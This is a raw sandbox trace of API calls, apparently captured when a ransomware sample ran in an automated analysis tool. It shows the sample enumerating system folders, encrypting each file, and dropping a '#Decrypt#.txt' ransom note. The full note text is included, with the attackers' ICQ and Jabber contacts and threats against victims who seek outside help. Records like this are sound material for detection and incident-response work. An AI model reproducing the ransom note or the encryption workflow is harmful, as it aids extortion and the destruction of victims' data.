ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x5f60c69, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadox28.tlb", cAlternateFileName="")) returned 1 [0250.991] lstrcmpiW (lpString1="msadox28.tlb", lpString2="Windows") returned -1 [0250.991] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned 57 [0250.991] StrStrIW (lpFirst="msadox28.tlb", lpSrch=".horseleader") returned 0x0 [0250.991] lstrcmpW (lpString1="msadox28.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.991] lstrcmpW (lpString1="msadox28.tlb", lpString2="_uninstalling_.png") returned 1 [0250.991] lstrlenW (lpString=".testttjffg") returned 11 [0250.991] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", lpSrch=".testttjffg") returned 0x0 [0250.991] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.991] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.991] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.992] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf55bba, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xbf55bba, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x347dbdb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadrh15.dll", cAlternateFileName="")) returned 1 [0250.992] lstrcmpiW (lpString1="msadrh15.dll", lpString2="Windows") returned -1 [0250.992] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned 57 [0250.992] StrStrIW (lpFirst="msadrh15.dll", lpSrch=".horseleader") returned 0x0 [0250.992] lstrcmpW (lpString1="msadrh15.dll", lpString2="#Decrypt#.txt") returned 1 [0250.992] lstrcmpW (lpString1="msadrh15.dll", lpString2="_uninstalling_.png") returned 1 [0250.992] lstrlenW (lpString=".testttjffg") returned 11 [0250.992] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll", lpSrch=".testttjffg") returned 0x0 [0250.992] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.992] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.992] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf55bba, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xbf55bba, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x347dbdb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadrh15.dll", cAlternateFileName="")) returned 0 [0250.992] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.992] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\#Decrypt#.txt") returned 58 [0250.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\ado\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.993] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.993] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.994] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.995] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.995] CloseHandle (hObject=0x21c) returned 1 [0250.995] GetProcessHeap () returned 0x780000 [0250.995] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0250.995] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf4f1c09, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbf4f1c09, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x128ffb00, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0250.995] lstrcmpiW (lpString1="DirectDB.dll", lpString2="Windows") returned -1 [0250.995] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll") returned 53 [0250.995] StrStrIW (lpFirst="DirectDB.dll", lpSrch=".horseleader") returned 0x0 [0250.995] lstrcmpW (lpString1="DirectDB.dll", lpString2="#Decrypt#.txt") returned 1 [0250.995] lstrcmpW (lpString1="DirectDB.dll", lpString2="_uninstalling_.png") returned 1 [0250.995] lstrlenW (lpString=".testttjffg") returned 11 [0250.995] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll", lpSrch=".testttjffg") returned 0x0 [0250.995] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0250.995] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0250.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.996] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="en-US", cAlternateFileName="")) returned 1 [0250.997] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0250.997] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US") returned 46 [0250.997] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0250.997] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0250.997] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.997] GetProcessHeap () returned 0x780000 [0250.997] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0250.997] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*") returned 48 [0250.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.998] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.998] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\.") returned 48 [0250.998] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.998] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.998] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.998] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\..") returned 49 [0250.998] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.998] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.998] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 1 [0250.998] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="Windows") returned -1 [0250.998] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned 63 [0250.998] StrStrIW (lpFirst="wab32res.dll.mui", lpSrch=".horseleader") returned 0x0 [0250.998] lstrcmpW (lpString1="wab32res.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0250.998] lstrcmpW (lpString1="wab32res.dll.mui", lpString2="_uninstalling_.png") returned 1 [0250.998] lstrlenW (lpString=".testttjffg") returned 11 [0250.998] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui", lpSrch=".testttjffg") returned 0x0 [0250.998] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.998] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.999] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 0 [0250.999] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.999] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\#Decrypt#.txt") returned 60 [0250.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.000] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.000] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.001] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.001] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.001] CloseHandle (hObject=0x21c) returned 1 [0251.001] GetProcessHeap () returned 0x780000 [0251.003] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.003] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="msadc", cAlternateFileName="")) returned 1 [0251.003] lstrcmpiW (lpString1="msadc", lpString2="Windows") returned -1 [0251.003] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc") returned 46 [0251.003] lstrcmpW (lpString1="msadc", lpString2=".") returned 1 [0251.003] lstrcmpW (lpString1="msadc", lpString2="..") returned 1 [0251.004] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.004] GetProcessHeap () returned 0x780000 [0251.004] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0251.004] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*") returned 48 [0251.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0251.011] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.011] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\.") returned 48 [0251.011] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.011] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0251.011] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.011] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\..") returned 49 [0251.011] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.012] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.012] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c44b4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa34c44b4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa05a2bb2, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x276, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="adcjavas.inc", cAlternateFileName="")) returned 1 [0251.012] lstrcmpiW (lpString1="adcjavas.inc", lpString2="Windows") returned -1 [0251.012] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 59 [0251.012] StrStrIW (lpFirst="adcjavas.inc", lpSrch=".horseleader") returned 0x0 [0251.012] lstrcmpW (lpString1="adcjavas.inc", lpString2="#Decrypt#.txt") returned 1 [0251.012] lstrcmpW (lpString1="adcjavas.inc", lpString2="_uninstalling_.png") returned 1 [0251.012] lstrlenW (lpString=".testttjffg") returned 11 [0251.012] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", lpSrch=".testttjffg") returned 0x0 [0251.012] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.013] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.013] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program 